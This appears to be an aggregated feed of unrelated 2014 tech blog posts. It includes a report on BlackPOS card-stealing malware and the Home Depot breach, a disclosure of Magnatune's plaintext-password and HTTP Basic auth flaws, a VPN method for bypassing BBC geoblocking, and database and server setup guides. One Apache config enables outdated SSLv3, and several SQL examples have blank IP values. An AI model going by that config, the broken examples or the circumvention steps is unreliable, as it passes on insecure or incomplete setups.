Clues buried within this newer version of BlackPOS support the theory put forth by multiple banks that the Home Depot breach may involve compromised store transactions going back at least several months. In addition, the cybercrime shop Rescator over the past few days pushed out nine more large batches of stolen cards onto his shop, all under the same “American Sanctions” label assigned to the first two batches of cards that originally tipped off banks to a pattern of card fraud that traced back to Home Depot. Likewise, the cards lifted from Target were sold in several dozen batches released over a period of three months on Rescator’s shop.

The cybercrime shop Rescator[dot]cc pushed out nine new batches of cards from the same “American Sanctions” base of cards that banks traced back to Home Depot.
POWERFUL ENEMIES The tip from a source about BlackPOS infections found at Home Depot comes amid reports from several security firms about the discovery of a new version of BlackPOS. On Aug. 29, Trend Micro published a blog post stating that it had identified a brand new variant of BlackPOS in the wild that was targeting retail accounts. Trend said the updated version, which it first spotted on Aug. 22, sports a few notable new features, including an enhanced capability to capture card data from the physical memory of infected point-of-sale devices. Trend said the new version also has a feature that disguises the malware as a component of the antivirus product running on the system.

Contents of the new BlackPOS component responsible for exfiltrating stolen cards from the network. Source: Trend Micro.

Trend notes that the new BlackPOS variant uses a similar method to offload stolen card data as the version used in the attack on Target.

“In one the biggest data breach[es] we’ve seen in 2013, the cybercriminals behind it offloaded the gathered data to a compromised server first while a different malware running on the compromised server uploaded it to the FTP,” wrote Trend’s Rhena Inocencio. “We surmise that this new BlackPOS malware uses the same exfiltration tactic.”

An Internet search on the unique malware “hash” signature noted in Trend’s malware writeup indicates that the new BlackPOS verison was created on June 22, 2014, and that as late as Aug. 15, 2014 only one of more than two-dozen anti-malware tools (McAfee) detected it as malicious.


Other clues in the new BlackPOS malware variant further suggest a link between the cybercrooks behind the apparent breach at Home Depot and the hackers who hit Target. The new BlackPOS variant includes several interesting text strings. Among those are five links to Web sites featuring content about America’s role in foreign conflicts, particularly in Libya and Ukraine.

One of the images linked to in the guts of the BlackPOS code.
Three of the links point to news, editorial articles and cartoons that accuse the United States of fomenting war and unrest in the name of Democracy in Ukraine, Syria, Egypt and Libya. One of the images shows four Molotov cocktails with the flags of those four nations on the bottles, next to a box of matches festooned with the American flag and match ready to strike. Another link leads to an image of the current armed conflict in Ukraine between Ukrainian forces and pro-Russian separatists.

This is interesting given what we know about Rescator, the individual principally responsible for running the store that is selling all of these stolen credit and debit cards. In the wake of the Target breach, I traced a long list of clues from Rescator’s various online identities back to a young programmer in Odessa, Ukraine. In his many personas, Rescator identified himself as a member of the Lampeduza cybercrime forum, and indeed this site is where he alerts customers about new batches of stolen cards.

As I discovered in my profile of Rescator, he and his crew seemed somewhat taken with the late despotic Libyan leader Muammar Gaddafi, although they prefer the phonetic spelling of his name. The Web site kaddafi[dot]hk was among four main carding shops run by Rescator’s crew (it has since been retired and merged with Rescator[dot]cc). The domain kaddafi[dot]me was set up to serve as an instant message Jabber server for cybercrooks, advertising its lack of logging and record keeping as a reason crooks should trust kaddafi[dot]me to handle their private online communications.

When I reached out to Rescator last December to obtain comment about my findings on his apparent role in the Target break-in, I received an instant message reply from the Jabber address “kaddafi@kaddafi[dot]me” (in that conversation, the person chatting with me from that address offered to pay me $10,000 if I did not run that story; I declined). But I also discovered that the kaddafi[dot]me domain was a blog of sorts that hosted some harsh and frankly chilling anti-American propaganda.

The entire three-part manifesto posted on the kaddafi[dot]me home page is no longer available, but a professionally translated snippet of this tirade reads:

“The movement of our Republic, the ideology of Lampeduza – is the opposition to Western countries, primarily targeting the restoration of the balance of forces in the world. After the collapse of the USSR, we have lost this fragile equilibrium face of the planet. We – the Senate and the top people of the Republic are not just fighting for survival and our place under the sun, we are driven by the idea! The idea, which is ​​living in all of us – to return all that was stolen and taken from our friendly countries grain by grain! We are fighting for a good cause! Hot blood is flowing in us, in citizens, who want to change situation in the world. We do not bend to other people’s opinions and desires, and give an adequate response to the Western globalism. It is essential to be a fighter for justice!

Perhaps we would be living completely differently now, if there had not been the plan of Allen Dulles, and if America had not invested billions in the collapse of the USSR. We were deprived of a common homeland, but not deprived of unity, have found our borders, and are even closer to each other. We saw the obvious principles of capitalism, where man to a man is a wolf [[see here for more context on this metaphor]]. Together, we can do a lot to bring back all the things that we have been deprived of because of America! We will be heard!

Citizens of Lampeduza – “free painters” ready to create and live the idea for the good of the Motherland — let’s first bend them over, and then insert deeper!!!

Google-translated version of Kaddafi[dot]me homepage.

Account churn Flameeyes's Weblog | 2014-09-07 14:30 UTC

In my latest post I singled out ne of the worst security experiences I’ve had with a service, but that is by far not the only bad experience I had. Indeed, given that I’ve been actively hunting down my old accounts and tried to get my hands on them, I can tell you that I have plenty of material to fill books with bad examples.

First of all, there is the problem of migrating the email addresses. For the longest time I’ve been using my GMail address to register everywhere, but then I decided to migrate to use my own domain (especially since Gandi supports two factor authentication, which makes it much safer). Unfortunately that means that not only I have a bunch of accounts still on the old email address, but I also have duplicate accounts.

Duplicate accounts become even more tricky when you consider that I had my own company, which meant I had double accounts for things that did not allow me to ship sometimes with a VAT ID attached, and sometimes not. Sometimes I could close the accounts (once I dropped the VAT ID), and sometimes I couldn’t, so a good deal of them are still out there.

FInally, there are the services that are available in multiple countries but with country-specific accounts. Which, don’t be mistaken, does not mean that every country has its own account database! It simply means that a given account is assigned to a country and does not work on any other. In most cases you cannot even migrate your account across countries. This is the case, for instance, of OVH, and why I moved to Gandi but also of PayPal (in which the billing address is tied to the country of the account and can’t be changed), IKEA and -PSN- Sony Online Entertainment. The end result is that I have duplicated (or even triplicated) accounts to cover the fact I have lived in multiple countries by now.

Also, it turns out that I completely forgot how many services I registered to over the years. Yes I have the passwords as stored by Chrome, but that’s not a comprehensive list as some of the most critical passwords have never been saved there (such as my bank’s password), plus some websites I have never used in Chrome, and at some point I had it clean the history of passwords and start from scratch. Some of the passwords have been saved in sgeps so I could look them up there, but even those are not a complete list. I ended up looking in my old email content to figure out which accounts I forgot having. The results have been fun.

But what about the grievances? Some of the accounts I wanted to gain access to again ended up being blocked or deleted, I’m surprised by the amount of services that either were killed, or moved around. At least three ebook stores I used are now gone, two of which absorbed by Kobo, while Marks & Spencer refused to recognize my email as valid, I assume they at some point reset their user database or something. Some of the hotel loyalty programs I signed up before and used once or twice disappeared, or were renamed/merged into something else. Not a huge deal but it makes account management a fun problem.

Then there are the accounts that got their password invalidated in the mean time, so even if I have a copy of it, it’s useless. Given that some accounts I had not logged into for years, that’s fair to happen: between leaks, heartbleed, and the overdue changes in best practices for password storage, I am more bothered by the services that did not invalidate my password in the mean time. But then again, there are different ways to deal with it. Some services when trying to login with the previous password point out that it’s no long valid and proceed with the same Forgotten password request workflow. Others will send you the password by email in plain text.

One quite egregious case happened with an Italian electronics shop, one of the first online-only stores I know of in Italy. Somehow, I knew that the account was still active, mostly because I could see their newsletter in the spam folder of my GMail account. So I went and asked for the password back, to change the address and stop the newsletter too (given I don’t live in Italy any longer), they sent me back the userid and password in cleartext. They reset their passwords in the mean time, and the default password became my Italian tax ID. Not very safe, if I were to know the user id of anyone else, knowing their tax ID is easy, as it can be calculated based on a few personal, but not so secret, details (full name, sex, date and city of birth).

But there is something worse than unannounced password resets. The dance of generating a new password. I have now the impression that it’s a minority of services that actually allow you to use whichever password you want. Lots of the services I have changed password for between last night and today required me to disable the non-alphanumeric symbols, because either they don’t support any non-alphanumeric character, or they only support a subset that LastPass does not let you select.

But this is not as bothersome as the length limitation of passwords. Most sites will be happy to tell you that they require a minimum of 6 or 8 characters for your password — few will tell you upfront the maximum length of a password. And very few of those that won’t tell you right away will fix the mistake by telling you when the password is too long, how long it can be. I even found sites that simply error out on you when you try to use a password that is not valid, and decide to invalidate both your old and temporary passwords, while not accepting the new one. It’s a serious pain.

Finally, I’ve enabled 2FA for as many services as I could; some of it is particularly bothersome (LinkedIn, I’ll probably write more about that), but at least it’s an extra safety. Unfortunately, I still find it extremely bothersome neither Google Authenticator nor RedHat’s FreeOTP (last time I tried) supported backing up the private keys of the configured OTPs. Since I switched between three phones in the past three months, I could use some help when having to re-enroll my OTP generators — I upgraded my phone, then had to downgrade because I broke the screen of the new one.

Gestern hatte ich die kühne Behauptung aufgestellt, es gebe technische Gründe, aus denen man PostgreSQL den Vorzug vor MySQL oder MariaDB geben könne. Heute möchte ich versuchen, das einmal anhand eines Beispiels aus der Praxis zu belegen. Dazu habe ich mir die Fähigkeit von PostgreSQL herausgepickt, mit Netzwerkadressen umgehen zu können.

Als Beispiel für die praktische Anwendung sei hier eine datenbankbasierte Blacklist genannt, die z. B. von einem Proxy, Spamfilter o. ä. genutzt wird. Für die anfragende Anwendung geht es dabei nur um die Frage, ob eine IP-Adresse in der Blacklist gesperrt ist oder nicht. Allerdings sollen nicht nur einzelne Hosts in der Blacklist definiert werden können, sondern auch Netzwerk-Segmente (also z. B. oder 2001:db8::/64).

Vom Elefanten

PostgreSQL bringt für IP-Adressen zwei eigene Datentypen mit, inet und cidr. Ersterer ist der flexiblere der beiden Typen und kann sowohl mit Netzwerken als auch Hosts umgehen. Besonders nützlich sind die zugehörigen Operatoren; insbesondere die contain-Operatoren <<, <<=, >> und >>= machen die gestellte Aufgabe zum Kinderspiel.

Eine passende Tabelle mit fortlaufender numerischer ID, Beschreibung und Zeitstempel lässt sich unter PostgreSQL mit folgendem SQL Statement erstellen:

CREATE TABLE acl_blacklist (  
    id serial PRIMARY KEY,
    ip inet,
    description character varying(255),
    created timestamp with time zone DEFAULT LOCALTIMESTAMP
Um ein wenig mit der Blacklist zu spielen, fügen wir zwei Beispiel-Netze und einen Host in die Blacklist ein:

INSERT INTO acl_blacklist (ip, description) VALUES  
    ('', 'My evil IPv4 net'),
    ('2001:db8::/64', 'My evil IPv6 net'),
    ('', 'My evil IPv4 host');
Eine Ausgabe der Tabelle sieht nun also so aus:

 id |       ip       |    description    |            created            
  1 | | My evil IPv4 net  | 2014-09-07 13:36:28.718252+02
  2 | 2001:db8::/64  | My evil IPv6 net  | 2014-09-07 13:36:28.718252+02
  3 |       | My evil IPv4 host | 2014-09-07 13:36:28.718252+02
Ob eine IP-Adresse nun durch die Blacklist gesperrt wurde oder nicht, lässt sich mit einem kurzen SQL Statement feststellen:

SELECT 1 FROM acl_blacklist WHERE '' <<= acl_blacklist.ip;  
Diese Abfrage liefert folgendes Ergebnis:

(1 row)
Mit einer IP-Adresse, die nicht durch die Blacklist gesperrt wurde (z. B. sieht das Ergebnis dann so aus:

(0 rows)
Mit IPv6-Adressen funktioniert das natürlich auch:

SELECT 1 FROM acl_blacklist WHERE '2001:db8::5' <<= acl_blacklist.ip;  
(1 row)
SELECT 1 FROM acl_blacklist WHERE '2001:db8:1::5' <<= acl_blacklist.ip;  
(0 rows)

Vom Delfin

MySQL bringt keinen eigenen Datentyp für IP-Adressen mit. Mit Hilfe eingebauter Funktionen lässt sich dennoch ein Workaround schaffen, mit dem eine vergleichbare Funktionalität wie unter PostgreSQL gegeben ist. Allerdings muss die Prüfung jeweils für IPv4 und IPv6 separat erfolgen; daher beschränkt sich das Beispiel nur auf IPv4.

Analog zu PostgreSQL wird zunächst eine Blacklist-Tabelle angelegt:

CREATE TABLE `acl_blacklist` (  
    `id` serial PRIMARY KEY,
    `ip` varchar(16) NOT NULL,
    `mask` tinyint(3) unsigned NOT NULL,
    `description` varchar(255) NOT NULL,
IP-Adresse und Netzmaske werden hier in separaten Feldern gespeichert. So kann später mit Hilfe der Funktion INET_ATON ein vergleichbares Abfrageergebnis wie unter PostgreSQL erzielt werden.

Auch hier fügen wir für Testzwecke einen Host und ein Netzwerk in die Tabelle ein:

INSERT INTO `acl_blacklist` (`ip`, `mask`, `description`) VALUES  
    ('', 24, 'My evil IPv4 net'),
    ('', 32, 'My evil IPv4 host');
Die Tabelle sieht nun also wie folgt aus:

| id | ip          | mask | description       | created             |
|  1 | |   24 | My evil IPv4 net  | 2014-09-07 14:15:21 |
|  2 |    |   32 | My evil IPv4 host | 2014-09-07 14:15:21 |
So weit halten sich die Unterschiede zu PostgreSQL noch in Grenzen. Die Abfrage, ob eine IP durch die Blacklist gesperrt wurde, gestaltet sich allerdings ungleich komplexer als bei PostgreSQL:

SELECT 1 FROM `acl_blacklist` WHERE  
    SUBSTRING(LPAD(BIN(INET_ATON('')), 32, 0), 1, `acl_blacklist`.`mask`) = 
    SUBSTRING(LPAD(BIN(INET_ATON(`acl_blacklist`.`ip`)), 32, 0), 1, `acl_blacklist`.`mask`);
Das Ergebnis sieht genauso aus wie unter PostgreSQL (von Formatspezifika der jeweiligen Command Line Interfaces einmal abgesehen):

| 1 |
| 1 |
1 row in set (0.00 sec)  
Mit einer IP-Adresse, die nicht durch die Blacklist gesperrt wurde (z. B. sieht das Ergebnis dann so aus:

Empty set (0.00 sec)  
IPv6-Unterstützung ließe sich übrigens noch einbauen, indem die WHERE Bedingung in der Abfrage mit OR ergänzt wird, wobei dann die IPv6-spezifische Funktion INET6_ATON genutzt werden muss. Außerdem muss das Datenfeld für die IP-Adresse dann entsprechend größer dimensioniert werden.


Zumindest in dieser Disziplin schlägt der Elefant den Delfin — und das nicht nur in Sachen Komplexität und Handhabbarkeit, sondern interessanterweise auch in Sachen Abfrageperformance. Der Grund dürfte wohl darin zu suchen sein, dass die Operatoren in PostgreSQL durch eine schnelle, interne Implementierung realisiert wurden, während die verschachtelten Funktionsaufrufe in MySQL unweigerlich zu einer Performance-Einbuße führen.

Bypassing Geolocation … | 2014-09-07 00:42 UTC

By now we all know that it is pretty easy to bypass geolocation blockage with a web proxy or vpn service. After all, there is over 2 million google results on “bbc vpn” … and I wanted to do just that to view a BBC show on privacy and the dark web.

I wanted to set this up as cheaply as possible but not use a service that I had to pay for a month since I only needed one hour. This requirement directed me towards a do-it-yourself solution with an hourly server in the UK. I also wanted reproducibility so that I could spin up a similar service again in the future.

My first attempt was to route my browser through a local SOCKS proxy via ssh tunneling, ssh -D 2001 user@uk-host.tld. That didn’t work because my home connection was not good enough to stream from BBC without incessant buffering.

Hmm, if this simple proxy won’t work then that strikes out many other ideas, I needed a way to use the BBC iPlayer Downloader to view content offline. Ok, but the software doesn’t have native proxy support (naturally). Maybe you could somehow use TOR and set the exit node to the UK. That seems like a poor/slow idea.

I ended up routing all my traffic through a personal OpenVPN server in London and then downloaded the show via the BBC software and watched it in HD offline. The goal was to provision the VPN as quickly as possible (time is money). A Linode StackScript is a feature that Linode offers, it is a user defined script ran at first boot of your host. Surprisingly, no one published one to install OpenVPN yet. So, I did: “Debian 7.5 OpenVPN” – feel free to use it on the Linode service to boot up a vpn automatically. It takes about two minutes to boot, install, and configure OpenVPN this way. Then you download the ca.crt and client configuration from the newly provisioned server and import it into your client.

End result: It took 42 minutes for me to download a one hour show. Since I shut down the VPN within an hour, I was charged the Linode minimum, $.015 USD. Though I recommend Linode (you can use my referral link if you want), this same concept applies to any provider that has a presence in the UK, like Digital Ocean who charges $.007/hour.

Addendum: Even though I abandoned my first attempt, I left the browser window open and it continued to download even after I was disconnected from my UK VPN. I guess BBC only checks your IP once then hands you off to the Akamai CDN. Maybe you only need a VPN service for a few minutes?

I also donated money to a BBC sponsored charity to offset some of my bandwidth usage and freeloading of a service that UK citizens have to pay for, I encourage you to do that same. For reference it costs a UK household, $.02 USD tax per hour for BBC. (source)

I have made a note of this in my previous post about Magnatune being terribly insecure. Those who follow me on Twitter or Google+ already got the full details of it but I thought I would repeat them here. And add a few notes about that.

I remember Magnatune back in the days in which I hang around #amarok and helped with small changes here and there, and bigger changes for xine itself. It was at the time often used as an example of good DRM-less services. Indeed, it sold DRM-free music way before Apple decided to drop its own music DRM, and its still one of the few services selling lossless music — if we exclude Humble Bundle and the games OSTs.

But then again, this is not a license to have terrible security, which is what Magnatune has right now. After naming Magnatune in my the aforementioned post I realized that I had not given it a new, good password but it’s instead still using one of the old passwords I used to use, which are both insecure by themselves, a bit too short, possibly suitable to dictionary attacks, and I was not even sure if it was using the password I used by default on many services before, which is of course terrible, and was most likely leaked at multiple points in time — at least my old Adobe account was involved in their big leak.

As I said before, I stopped using fixed passwords some time last year, and then I decided to jump on LastPass when Heartbleed required me to change passwords almost everywhere. But it takes a while to change passwords in all your accounts, especially when you forget about some accounts altogether, like the Magnatune one above.

So I went to Magnatune website to change my password, but of course I forgot what the original was, so I went on and decided to follow the procedure for forgotten passwords. The first problem happens here: it does not require me to know which email address I registered with, instead it asks me (alternatively) for an username, which is quite obvious (Flameeyes, what else? There are very few sites where I use different usernames, one of which being Tumblr, and that’s usually because Flameeyes is taken). When I type that in, it actually shows me on the web page the email address I’m registered with.

What? This is a basic privacy issue: if it wasn’t that I actually don’t vary my email addresses that much, an attacker could now find an otherwise private email address. Worse yet, by using the users available in previous dumps, it’s possible to assign them to email addresses, too. Indeed, A quick check provided me with at least one email address of a friend of mine by just using her usual username — I already knew the email address but that shouldn’t be a given.

Anyway, I got an email back from Magnatune just a moment later. The email contains the password in plain text, which indicates they store it that way, which is bad practice. A note about plain text passwords: there is no way to prove beyond any doubt that a service is hashing (or hashing and salting) user passwords, but you can definitely prove otherwise. If you receive your password back in plain text when you say you forgot it, then the service does not store hashed passwords. Conversely, even if the service sends you a password reset link instead, it’s still possible it’s storing the plain text password. This is most definitely unfortunate.

Up to here, things would be bad but not that uncommon, as the linked Plain Text Offenders site above would show you — and I have indeed submitted a screenshot of the email to them. But there is one more thing you can find out from the email they sent. You may remember that some months ago I wrote about email security and around the same time so did the Google Official blog – for those who wonder, no I had no idea that such a post was being written and the similar timing was a complete coincidence – so what’s the status of Magnatune? Well, unfortunately it’s bleak, as they don’t encrypt mail in transit:

Received: from ([])
        by with ESMTP id h11si9367820pdl.64.2014.
        for <f********@*****.***>;
        Thu, 28 Aug 2014 15:47:42 -0700 (PDT)
If the sending server spoke TLS to the GMail server (yes it’s gmail in the address I censored), it would have shown something like (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); (which appears in the comment messages I receive from my own blog).

Not encrypting the email in transit means that anybody that could have sniffed the traffic coming out of Magnatune’s server would be able to access any of their customers’ accounts: they just need to snoop the email traffic and they can receive all the password. Luckily, the email server from which the email arrived is hosted at a company I trust very much, as I’m their customer too.

So I tried logging in with my username and newly-reminded password, unfortunately my membership expired years ago, which means I get no access at all — so I can’t even change my password or my email address. Too bad. But then it allowed me to figure out some more problems with the security situation of Magnatune.

When you try to login, you get sent on a different website depending on which kind of membership you subscribe(d) to. In my case I got the download membership — when you go there, you get presented with a dialog requesting user and password from your browser. It’s standard HTTP based authentication. It’s not very common because it’s not really user friendly: you can’t serve any content until the user either puts the right username/password or decides they don’t know a valid combination and cancel the dialog, in which case a final 401 error is reported, and whichever content the server sent will be displayed by the browser.

Beside the userfriendliness (or lack thereof), HTTP authentication can be tricky, too. There are two ways to provide authentication over HTTP, one is Basic and the other is Digest — neither is very secure by default. Digest is partially usable, but suffer from lack of authentication of parties, making MitM attacks trivial, while Basic, well, allows a sniffer to figure out username and password as they travel in plaintext over the wire. HTTP authentication is, though, fairly secure if you use it in conjunction with TLS. Indeed for some of my systems I use HTTP authentication on a HTTPS connection, as it allows me to configure the authentication at the web server level without support from the application itself.

What became obvious to me while failing to log in to Magnatune was that the connection was not secure: it was cleartext HTTP that it was trying to get me to log in through. So I checked the headers to figure out which kind of authentication it was doing. At this point I have to use “of course” to say that it is using Basic authentication: cleartext username and password on the wire. This is extremely troublesome.

While not encrypting email reduces the attack surface, making it mostly a matter of people sniffing at the datacenter where Magnatune is hosted – assuming you use an email provider that is safe or trustworthy enough, I consider mine so – using basic authentication extend the surface immensely. Indeed, if you’re logging in Magnatune from a coffee shop or any other public open WiFi, you are literally broadcasting over the network your username and password.

I can’t know if you can change your Magnatune password once you can log in, since I can’t log in. But I know that the alternative to the download membership is the streaming membership, which makes it very likely that a Magnatune user would be logging in while at a Starbucks, so that they can work on some blog post or on source code of their mobile app while listening to music. I would hope they used a different password for Magnatune than for their email address — since as I noted above, you can get to their email address just by knowing their username.

I don’t worry too much. My Magnatune password turned out to be different enough from most of my other passwords that even if I don’t change it and gets leaked it won’t compromise any other service. Even more so now that I’m actively gathering all my account and changing their passwords.

Elefantenhaus My Universe | 2014-09-06 13:15 UTC

Es gibt zahlreiche technische Gründe, aus denen man PostgreSQL einem anderen RDBMS wie MySQL oder MariaDB vorziehen wollen könnte — letztlich kommt es aber auf das Einsatzszenario an, weshalb es auch für MySQL & Co gute Gründe (wie z. B. Lesegeschwindigkeit) und auch weniger gute Gründe (wie z. B. Wordpress' Fixierung auf MySQL) geben kann.

Es gibt aber auch ein gewichtiges nicht-technisches Argument für den blauen Elefanten: Monty & Co haben beschlossen, mit MariaDB 10 die Kompatibilität zu MySQL zumindest teilweise zu brechen, und derzeit ist noch kaum absehbar, welches der beiden Datenbanksysteme sich langfristig durchsetzen wird; geschweige denn wie Applikationen mit den aller Voraussicht nach wachsenden Inkompatibilitäten umgehen werden.

Wer nun — aus welchen Gründen auch immer — auf PostgreSQL umsteigen möchte, wird früher oder später die Frage nach einer vernünftigen, webbasierten Administrationsoberfläche stellen; schließlich gibt es für MySQL mit phpMyAdmin ein recht ausgereiftes Werkzeug. Die Standard-Antwort lautet meist phpPgAdmin; ein Tool jedoch, das mittlerweile arg altbacken daher kommt und dessen Weiterentwicklung dem Anschein nach eher schleppend verläuft.

Eine wirklich gute Alternative findet sich mit TeamPostgreSQL, das eine moderne, AJAX-basierte Oberfläche bietet und jede Menge nützlicher Fähigkeiten mitbringt, wie z. B. einen SQL Editor mit Auto Completion oder in-line Bearbeitung von Datensätzen. Einziger Wermutstropfen: Es handelt sich hier um eine Java Webapplikation, was das Deployment vermeintlich kompliziert macht — zumal der Software zur Zeit jegliche Dokumentation fehlt.

Dem ist jedoch nicht wirklich so. Für ein solides Produktivsystem sollte aber nicht der eingebaute Jetty-Container genutzt werden, sondern ein „erwachsener“ Servlet Container wie z. B. Apache Tomcat. Unter FreeBSD kann man den nebst Abhängigkeiten bequem per pkg installieren. TeamPostgreSQL installiert sich dann schon (fast) von allein…

pkg ins tomcat8

cat >> /etc/rc.conf << EOF  

cd ~  
cd teampostgresql  
cp -r webapp /usr/local/apache-tomcat-8.0/webapps/  
cd /usr/local/apache-tomcat-8.0/webapps/  
mv webapp teampostgresql  
chown -R www:www teampostgresql  
mkdir -p /usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql  
chown www:www /usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql  
Nun fehlt nur noch eine brauchbare Konfiguration für TeamPostgreSQL. Diese legt man in der Datei webapps/teampostgresql/WEB-INF/teampostgresql-config.xml ab (eine Datei mit Standardwerten ist bereits vorhanden und muss nur aktualisiert werden):

<?xml version="1.0" encoding="UTF-8"?>  
<config xmlns:xsi="" xsi:type="config">  
Nun kann Tomcat gestartet werden:

service tomcat8 start  
Und ab sofort sollte TeamPostgreSQL unter /teampostgresql verfügbar sein. Wer dem Tool eine eigene Subdomain spendieren möchte und ohnehin bereits einen Reverse Proxy betreibt, kann etwa folgende Konfiguration verwenden:

<VirtualHost [2001:db8::1]:80>  
    ErrorLog /var/log/pgsql-error.log
    CustomLog /var/log/pgsql-access.log combined

    RewriteEngine on
    RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [L,R=permanent]

    ProxyRequests Off
    <Proxy *>
        Require all denied

<VirtualHost [2001:db8::1]:443>  
    ErrorLog /var/log/pgsql-error-ssl.log
    CustomLog /var/log/pgsql-access-ssl.log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %>s %b \"%{cache-status}e\" \"%{User-Agent}i\""

    SSLEngine On
    SSLProtocol -ALL +SSLv3 +TLSv1 +TLSv1.1 +TLSv1.2
    SSLHonorCipherOrder on
    SSLCompression off
    SSLCertificateFile "/usr/local/etc/ssl/cert/server-cert.pem"
    SSLCertificateKeyFile "/usr/local/etc/ssl/keys/server-key.pem"
    SSLCertificateChainFile "/usr/local/etc/ssl/ca/server-ca.pem"
    Header add Strict-Transport-Security "max-age=15768000"
    ServerSignature Off

    ProxyTimeout 25
    ProxyRequests Off
    ProxyPass /
    ProxyPassReverse /
    ProxyPreserveHost On
Damit wird es möglich, Tomcat nicht weiter nach außen hin zu exponieren und die Webapplikation zusätzlich über SSL zu schützen.

Bash has many subtle pitfalls, some of them being able to live unnoticed for a very long time. A common example of that kind of pitfall is ubiquitous filename expansion, or globbing. What many script writers forget about to notice is that practically anything that looks like a pattern and is not quoted is subject to globbing, including unquoted variables.

There are two extra snags that add up to this. Firstly, many people forget that not only asterisks (*) and question marks (?) make up patterns — square brackets ([) do that as well. Secondly, by default bash (and POSIX shell) take failed expansions literally. That is, if your glob does not match any file, you may not even know that you are globbing.

It's all just a matter of running in the proper directory for the result to change. Of course, it's often unlikely — maybe even close to impossible. You can work towards preventing that by running in a safe directory. But in the end, writing predictable software is a fine quality.

How to notice mistakes?

Bash provides a two major facilities that could help you stop mistakes — shopts nullglob and failglob.

The nullglob option is a good choice for a default for your script. After enabling it, failing filename expansions result in no parameters rather than verbatim pattern itself. This has two important implications.

Firstly, it makes iterating over optional files easy:

for f in a/* b/* c/*; do
    some_magic "${f}"
Without nullglob, the above may actually return a/* if no file matches the pattern. For this reason, you would need to add an additional check for existence of file inside the loop. With nullglob, it will just ‘omit’ the unmatched arguments. In fact, if none of the patterns match the loop won't be run even once.

Secondly, it turns every accidental glob into null. While this isn't the most friendly warning and in fact it may have very undesired results, you're more likely to notice that something is going wrong.

The failglob option is better if you can assume you don't need to match files in its scope. In this case, bash treats every failing filename expansion as a fatal error and terminates execution with an appropriate message.

The main advantage of failglob is that it makes you aware of any mistake before someone hits it the hard way. Of course, assuming that it doesn't accidentally expand into something already.

There is also a choice of noglob. However, I wouldn't recommend it since it works around mistakes rather than fixing them, and makes the code rely on a non-standard environment.

Word splitting without globbing

One of the pitfalls I myself noticed lately is the attempt of using unquoted variable substitution to do word splitting. For example:

for i in ${v}; do
    echo "${i}"
At a first glance, everything looks fine. ${v} contains a whitespace-separated list of words and we iterate over each word. The pitfall here is that words in ${v} are subject to filename expansion. For example, if a lone asterisk would happen to be there (like v='10 * 4'), you'd actually get all files in the current directory. Unexpected, isn't it?

I am aware of three solutions that can be used to accomplish word splitting without implicit globbing:

  1. setting shopt -s noglob locally,
  2. setting GLOBIGNORE='*' locally,
  3. using the swiss army knife of read to perform word splitting.
Personally, I dislike the first two since they require set-and-restore magic, and the latter also has the penalty of doing the globbing then discarding the result. Therefore, I will expand on using read:

read -r -d '' -a words <<<"${v}"
for i in "${words[@]}"; do
    echo "${i}"
While normally read is used to read from files, we can use the here string syntax of bash to feed the variable into it. The -r option disables backslash escape processing that is undesired here. -d '' causes read to process the whole input and not stop at any delimiter (like newline). -a words causes it to put the split words into array ${words[@]} — and since we know how to safely iterate over an array, the underlying issue is solved.

32bit Madness Patrick's playground | 2014-09-05 06:41 UTC

This week I ran into a funny issue doing backups with rsync:
rsnapshot/weekly.3/server/storage/lost/of/subdirectories/some-stupid.file => rsnapshot/daily.0/server/storage/lost/of/subdirectories/some-stupid.file
ERROR: out of memory in make_file [generator]
rsync error: error allocating core memory buffers (code 22) at util.c(117) [generator=3.0.9]
rsync error: received SIGUSR1 (code 19) at main.c(1298) [receiver=3.0.9]
rsync: connection unexpectedly closed (2168136360 bytes received so far) [sender]
rsync error: error allocating core memory buffers (code 22) at io.c(605) [sender=3.0.9]
Oopsiedaisy, rsync ran out of memory. But ... this machine has 8GB RAM, plus 32GB Swap ?!
So I re-ran this and started observing, and BAM, it fails again. With ~4GB RAM free.

4GB you say, eh? That smells of ... 2^32 ...
For doing the copying I was using sysrescuecd, and then it became obvious to me: All binaries are of course 32bit!

So now I'm doing a horrible hack of "linux64 chroot /mnt/server" so that I have a 64bit environment that does not run out of space randomly. Plus 3 new bugs for the Gentoo livecd, which fails to appreciate USB and other things.
Who would have thought that a 16TB partition can make rsync stumble over address space limits ...

By popular demand, the source tree for the Lumina project has just been moved to its own repository within the main PC-BSD project tree on GitHub.

In addition to this, an official FreeBSD port for Lumina was just committed to the FreeBSD ports tree which uses the new repo.


By the way, here is a quick usage summary for those that are interested in how “light” Lumina 0.6.2 is on PC-BSD 10.0.3:

System: Netbook with a single 1.6GHz atom processor and 2GB of memory (Fresh installation of PC-BSD 10.0.3 with Lumina 0.6.2)

Usage: ~0.2–0.4% CPU and ~120MB active memory use (no apps running except an xterm with “top” after a couple minutes for the PC-BSD tray applications to start up and settle down)

Last night, this worked fine. This morning, it fails: # ansible-playbook jail-mailjail.yml PLAY [mailjails] ************************************************************** GATHERING FACTS *************************************************************** failed: [] => {"failed": true, "parsed": false} invalid output was: Sorry, try again. Sorry, try again. Sorry, try again. sudo: 3 incorrect password attempts TASK: [pkg | install pkg] ***************************************************** FATAL: no hosts matched or all hosts [...]

PC-BSD 10.0.3-RC2 ISO images are now available for testing.

Users on the EDGE package set, or 10.0.3-RC1 can update to the newer set with the following commands:

# pkg update –f
# pkg upgrade
# pc-extractoverlay ports

This update brings in the newer pkgng 1.3.7, which may need to re-install many of your packages in order to properly fix an issue with shared-library version detection in previous pkgng releases.

The current plan is to release 10.0.3 early next week, so please let us know of any issues right away via our RedMine bug tracker.

AMD HSA Patrick's playground | 2014-09-03 06:25 UTC

With the release of the "Kaveri" APUs AMD has released some quite intriguing technology. The idea of the "APU" is a blend of CPU and GPU, what AMD calls "HSA" - Heterogenous System Architecture.
What does this mean for us? In theory, once software catches up, it'll be a lot easier to use GPU-acceleration (e.g. OpenCL) within normal applications.

One big advantage seems to be that CPU and GPU share the system memory, so with the right drivers you should be able to do zero-copy GPU processing. No more host-to-GPU copy and other waste of time.

So far there hasn't been any driver support to take advantage of that. Here's the good news: As of a week or two ago there is driver support. Still very alpha, but ... at last, drivers!

On the kernel side there's the kfd driver, which piggybacks on radeon. It's available in a slightly very patched kernel from AMD. During bootup it looks like this:
[    1.651992] [drm] radeon kernel modesetting enabled.
